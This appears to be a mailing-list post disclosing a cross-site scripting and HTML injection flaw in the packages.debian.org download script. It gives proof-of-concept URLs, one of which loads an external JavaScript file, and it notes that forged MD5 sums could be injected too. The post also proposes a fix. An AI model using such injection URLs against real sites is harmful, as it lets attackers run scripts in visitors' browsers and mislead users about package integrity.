code injection in packages.debian.org
Hello,
[please CC me in replies, I'm not subscribed]
it's easy to do some code injection in packages.debian.org:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked&arch=i386&type=main
Credits go to fefe (http://blog.fefe.de/?ts=bb838974) for finding this.
Even better:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked<script%20src="http://www.cboltz.de/tmp/alert.js"></script>&arch=i386&type=main
Or my personal favorite:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=d41d8cd98f00b204e9800998ecf8427e<p>Powered%20by%20<img%20src="http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png">&arch=i386&type=main
*SCNR*
One could also "just" inject wrong MD5SUMs easily...
Proposed solution:
Please read the MD5SUM from a file or database instead of an URL parameter ;-)
Regards,
Christian Boltz
--
Fontlinge developer
Fontlinge - font management for Linux / Schriftenverwaltung für Linux
Infos und Download: http://www.gesindel.de
Reply to: